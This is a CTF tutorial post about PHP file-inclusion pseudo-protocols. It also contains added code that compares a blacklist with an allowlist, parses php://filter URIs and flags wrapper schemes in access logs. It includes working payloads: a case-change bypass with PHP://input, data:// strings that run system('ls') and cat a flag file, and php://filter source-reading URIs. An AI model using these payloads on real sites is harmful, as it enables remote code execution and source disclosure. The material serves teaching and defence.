[Learn a little new knowledge every day] Commonly used pseudo-protocols in file inclusion

1. Pseudo-protocols

file:// — access the local filesystem
http:// — access HTTP(S) URLs
ftp:// — access FTP(S) URLs
php:// — access the various input/output streams (I/O streams)
zlib:// — compression streams
data:// — data (RFC 2397)
glob:// — find pathnames matching a pattern
phar:// — PHP archives
ssh2:// — Secure Shell 2
rar:// — RAR archives
ogg:// — audio streams
expect:// — handle interactive streams

The following are examples of some of the more commonly used pseudo-protocols and how they are used.

1.1 php://input

It can be used to execute PHP code; the code is submitted in the body of a POST request.

Here is an example using the Web_php_include challenge on the Attack & Defense World (adworld) CTF platform.

The challenge source contains $page=str_replace("php://", "", $page); which replaces php:// in the page parameter with an empty string, so this check has to be bypassed.

Use php://input to execute the ls command and list the files. Because str_replace is case-sensitive while PHP resolves wrapper names case-insensitively, changing the case of the wrapper name (for example PHP://input) bypasses the replacement.

The results are as follows (I kept failing to POST from Chrome, so this is the result of the POST executed with the Firefox plug-in):

With the file name known, it is just a matter of POSTing directly:

Get the flag:
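The reason the challenge's check fails is worth seeing next to a fix. The block below is an added example, not code from the original post or from the challenge: it keeps the challenge's str_replace blacklist as blacklist_filter() and puts an allowlist-based resolve_page() beside it. The function names, the PAGE_MAP entries and the base directory /var/www/pages are assumptions made for this example; the inputs are constructed from the payload shapes discussed in this post.

```php
<?php
// Added example, not code from the original post or the challenge: the
// challenge's blacklist beside an allowlist-based include. The function names,
// the PAGE_MAP entries and the base directory are all assumptions made here.

// What the challenge does: strip one exact spelling of "php://".
function blacklist_filter(string $page): string
{
    // str_replace() is case-sensitive, while PHP resolves wrapper names
    // case-insensitively, so "PHP://input" passes through unchanged.
    // It also does nothing against data://, phar:// or zip://.
    return str_replace("php://", "", $page);
}

// Hardened approach: the request only selects a key; the path is built from
// constants, so user input never becomes part of the include target.
const PAGE_MAP = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

function resolve_page(string $page, string $baseDir): ?string
{
    // Anything that is not a known key is rejected: values with a scheme
    // ("PHP://input"), traversal ("../.."), or an archive fragment ("%23").
    if (!array_key_exists($page, PAGE_MAP)) {
        return null;
    }
    return $baseDir . '/' . PAGE_MAP[$page];
}

// Constructed inputs: one legitimate page name and three of the payload
// shapes discussed in this post.
$inputs = [
    'home',
    'PHP://input',
    'data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=',
    '../../etc/passwd',
];

foreach ($inputs as $in) {
    printf("%-55s blacklist: %-55s allowlist: %s\n",
        $in,
        blacklist_filter($in),
        resolve_page($in, '/var/www/pages') ?? 'rejected');
}
```

Running it shows PHP://input leaving the blacklist untouched while only the key home resolves through the allowlist. One caveat for the ini side: allow_url_include (Off by default) stops include() from loading php://input and data:// targets, but phar:// and zip:// are local wrappers and are not governed by it, so the allowlist, not the ini setting, is the control to rely on.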

1.2 php://filter

It is used to read source code, and its parameters are submitted through a GET request. php://filter is a filter that can be used as an intermediate stream to process other streams: it is usually used to read or write part of the data, applying some filtering before the read or write, such as base64 encoding or rot13 processing.

Parameters of php://filter:

resource=<data stream to filter>
    Required. Specifies the data stream you want to filter.

read=<filter list for the read chain>
    Optional. One or more filter names, separated by the pipe character (|).

write=<filter list for the write chain>
    Optional. One or more filter names, separated by the pipe character (|).

<filter list for both chains>
    Any filter list not prefixed with read= or write= is applied to the read or write chain as appropriate.

Common forms:

?a=php://filter/read=convert.base64-encode/resource=xxx.php

The iconv filter performs a character-encoding conversion on the data passing through. Its form is convert.iconv.<input-encoding>.<output-encoding> or convert.iconv.<input-encoding>/<output-encoding>; both mean the same thing, namely converting the input string from the input encoding to the specified output encoding.

For example:

?a=php://filter/read=convert.iconv.utf-8.utf-16/resource=xxx.php

That is, the input is read as UTF-8 and the output is written as UTF-16.
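The parameter table and the two forms above describe a small grammar. The following parser is an added example, not code from the original post: parse_filter_uri() is a hypothetical helper that splits a php://filter URI into its resource, read chain, write chain and un-prefixed (both-chain) filter lists, which is what a reviewer going through logs wants to see first (which file was read, and through which filters). The sample URIs are constructed from the forms shown in this section.

```php
<?php
// Added example, not code from the original post: a small parser for
// php://filter URIs following the parameter table above (resource=, read=,
// write=, and un-prefixed segments that apply to both chains).

function parse_filter_uri(string $uri): ?array
{
    // Wrapper names are case-insensitive, so PHP://FILTER/ is accepted too.
    if (!preg_match('#^php://filter/(.*)$#i', $uri, $m)) {
        return null; // not a php://filter URI
    }
    $rest  = $m[1];
    $parts = ['read' => [], 'write' => [], 'both' => [], 'resource' => null];

    // resource= is required and takes the remainder of the URI, because the
    // target path itself may contain "/".
    $pos = stripos($rest, 'resource=');
    if ($pos === false) {
        return null; // required parameter missing
    }
    $parts['resource'] = substr($rest, $pos + strlen('resource='));
    $rest = substr($rest, 0, $pos);

    // Everything before resource= is "/"-separated; each segment is a
    // "|"-separated filter list, optionally prefixed with read= or write=.
    foreach (explode('/', $rest) as $segment) {
        if ($segment === '') {
            continue;
        }
        if (stripos($segment, 'read=') === 0) {
            $parts['read'] = array_merge($parts['read'], explode('|', substr($segment, 5)));
        } elseif (stripos($segment, 'write=') === 0) {
            $parts['write'] = array_merge($parts['write'], explode('|', substr($segment, 6)));
        } else {
            $parts['both'] = array_merge($parts['both'], explode('|', $segment));
        }
    }
    return $parts;
}

// Constructed inputs based on the forms shown in this section.
$examples = [
    'php://filter/read=convert.base64-encode/resource=xxx.php',
    'php://filter/read=convert.iconv.utf-8.utf-16/resource=xxx.php',
    'php://filter/string.rot13|convert.base64-encode/write=string.toupper/resource=/var/www/html/a.php',
];
foreach ($examples as $uri) {
    print_r(parse_filter_uri($uri));
}
```

The resource field is the one to alert on: when an include() target is run through convert.base64-encode, the file contents come back as base64 text instead of being executed, which is why this wrapper shows up in source-disclosure attempts against include-style parameters.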

1.3 The zip:// and phar:// pseudo-protocols

Used to read a file inside an archive.

Common forms (in the zip:// form, %23 is the URL-encoded # that separates the archive path from the file inside it):

/about.php?f=phar://./images/1499394959.jpg/1.php
/about.php?f=zip://./images/1499394959.jpg%231.php

1.4 The file:// protocol

Common form:

file://[absolute path on the local filesystem]

For example:

?file=file://D:/Server/htdocs/emlog/phpinfo.txt

1.5 The data:// protocol

Common forms:

data://text/plain,xxxx (the PHP code to execute)

data://text/plain;base64,xxxx (the data, base64-encoded)

For example:

?page=data://text/plain,
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=

Using the same CTF challenge as above,

the data:// protocol executes the commands directly:

?page=data://text/plain,<?php%20system("ls")?>
?page=data://text/plain,<?php%20system("cat%20fl4gisisish3r3.php")?>

Get the flag.
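Every wrapper in this post arrives through a request parameter, and the str_replace check in the challenge shows the two normalisations a detector must not skip: case and URL decoding. The block below is an added example, not code from the original post: find_wrappers() is a hypothetical helper that extracts the query string from combined-format access-log lines, URL-decodes each value twice and flags any value that starts with one of the wrapper schemes listed at the top of this post. The log lines are constructed for this example from the request shapes shown above.

```php
<?php
// Added example, not code from the original post: flag stream-wrapper schemes
// in the query string of web-server access-log lines. The log lines are
// constructed for this example.

// Wrapper names from the list at the top of this post (plus https).
const WRAPPER_SCHEMES = ['file', 'http', 'https', 'ftp', 'php', 'zlib', 'data',
                         'glob', 'phar', 'ssh2', 'rar', 'ogg', 'expect', 'zip'];

// Returns findings as [parameter name, scheme, decoded value] triples.
function find_wrappers(string $logLine): array
{
    $findings = [];
    // Pull the request target out of a combined-format log line.
    if (!preg_match('#"(?:GET|POST|PUT|HEAD) (\S+) HTTP/#', $logLine, $m)) {
        return $findings;
    }
    $target = $m[1];
    $q = strpos($target, '?');
    if ($q === false) {
        return $findings; // no query string, nothing to inspect here
    }
    $schemes = implode('|', array_map('preg_quote', WRAPPER_SCHEMES));
    // Match "<scheme>:" at the start of the value. Case-insensitive because
    // PHP resolves wrapper names that way (PHP://input behaves like
    // php://input), and "data:" is valid with or without the "//".
    $pattern = '#^\s*(' . $schemes . '):#i';

    foreach (explode('&', substr($target, $q + 1)) as $pair) {
        [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
        // Decode twice so %25 double-encoding does not hide the scheme.
        $decoded = urldecode(urldecode($value));
        if (preg_match($pattern, $decoded, $mm)) {
            $findings[] = [urldecode($name), strtolower($mm[1]), $decoded];
        }
    }
    return $findings;
}

// Constructed log lines: one benign request and four wrapper requests.
$logLines = [
    '10.0.0.5 - - [12/Feb/2023:10:15:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Feb/2023:10:15:09 +0000] "POST /index.php?page=PHP://input HTTP/1.1" 200 88',
    '10.0.0.5 - - [12/Feb/2023:10:15:21 +0000] "GET /about.php?f=zip://./images/1499394959.jpg%231.php HTTP/1.1" 200 40',
    '10.0.0.5 - - [12/Feb/2023:10:15:30 +0000] "GET /index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4= HTTP/1.1" 200 70',
    '10.0.0.5 - - [12/Feb/2023:10:15:41 +0000] "GET /index.php?a=%2570hp://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 900',
];

foreach ($logLines as $line) {
    foreach (find_wrappers($line) as [$param, $scheme, $value]) {
        printf("ALERT scheme=%-5s param=%-4s value=%s\n", $scheme, $param, $value);
    }
}
```

The benign line produces nothing; the other four are flagged as php, zip, data and php respectively, the last one only because of the second decoding pass. One limitation to keep in mind: with php://input the code travels in the POST body, which an access log does not record, so the log only shows the wrapper name in the query string; catching the body itself needs a WAF or application-level request logging.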

Origin: blog.csdn.net/m0_51683653/article/details/128907240